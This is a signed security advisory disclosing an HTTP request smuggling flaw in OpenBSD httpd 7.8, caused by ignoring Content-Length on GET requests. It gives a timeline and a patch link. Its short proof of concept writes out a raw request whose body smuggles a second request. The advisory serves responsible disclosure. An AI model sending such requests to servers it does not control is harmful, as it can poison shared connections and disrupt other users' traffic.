-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2026-009 Product: OpenBSD httpd Manufacturer: OpenBSD Affected Version(s): 7.8 Tested Version(s): 7.8 Vulnerability Type: CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') Risk Level: High Solution Status: Fixed Manufacturer Notification: 2026-02-23 Solution Date: 2026-02-26 Public Disclosure: 2026-04-16 CVE Reference: Not yet assigned Author of Advisory: Nicola Staller, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The manufacturer describes the product as follows (see [1]): "The httpd daemon is an HTTP server with FastCGI and TLS support." Due to ignoring the Content-Length header when sent in a GET request, OpenBSD httpd is vulnerable to HTTP request smuggling. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: OpenBSD httpd ignores the Content-Length header in GET requests. When used in conjunction with a front end, this leads to the request body poisoning the connection to the server and thus HTTP request smuggling. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Send an HTTP GET request with a Content-Length and body such as the following. Note that line breaks are explicitly shown in the following request: GET / HTTP/1.1\r\n Host: \r\n Connection: keep-alive\r\n Content-Length: 28\r\n \r\n GET /404 HTTP/1.1\r\n X-Ignore: Issue a second follow-up request in the same TCP connection and observe that it receives an unexpected 404 response. Alternatively, configure a reverse proxy in conjunction with OpenBSD httpd. This more realistic scenario shows that interfering with other TCP connections is possible as well due to connection reuse by the reverse proxy. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to the latest OpenBSD httpd version. For more information, see [4]. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2026-02-03: Vulnerability discovered 2026-02-23: Vulnerability reported to manufacturer 2026-02-26: Patch released by manufacturer 2026-04-16: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for OpenBSD httpd https://man.openbsd.org/httpd.8 [2] SySS Security Advisory SYSS-2026-009 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-009.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] Commit containing the patch https://github.com/openbsd/src/commit/9ee2644e0e6156f38dfc289fe17d922ae5497b32 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Nicola Staller of SySS GmbH. E-Mail: nicola.staller@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc Key ID: 0x9DF339F941DD2290 Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmneI68ACgkQnfM5+UHd IpDS+A//Y0vdmC1jYjDIZ/fbkWxBegmY/KEmyYEWxTBREbNBmN6whWl84rJDjp4U O4cBMg8U0FCSqbYorAlFPVqydHw1YvVldc2pMIiiJRAK1I0ebc0OpJ1pXsmjcQDX DPvOwvPpnszfw9Tcw6ACEDNz188BX0i+aD028zpNT2TzOk3xnBueUpy+fhFDq803 INaf9KRXWfqxiAzth/03GP5hFYZ3OTGnQl4v62uLBjPN+XJt+sJhYK4HTj6nLzB6 oMCgm9MjCevDCIKje3qjGsZsKoPeFuCgQPp/m2QVrPaBZDnaDKPRlpG6qcjWtbKB UgoMIXE9zMBgxkEvhhOCE7BKlzQWTG8775gYv+q78UAjy6HXV7abXG+TMG1PxWy1 L6Lty8cIQXWGswBSKuo14p1MDdDEXhZJ8RjHNEnvCeMS0wTODTw5W70fitXmoebV 5m1fp/P9mUPtjGVeCHm7pjGDSywMrWbuTH4ejvDkocKxzKzNfX+YrdYfoaqDNe4T 1tv6WuZ6POHXZBXjbCXEbHhaZSONMEVUzXihddbO5QsHUhlHWFVJXsIfBZkaIC3/ 56R8NzpMkwRAlTeRQ/6ZUKRtGEQIFEoqpcx3oUUM3DKdhxGThlprlHIUhfQYc/2m GBEt23CONrmmWM3v0ulCH14Zsh2Kc45xA+Hv/MqMjFfKpgmNqH4= =OfOx -----END PGP SIGNATURE-----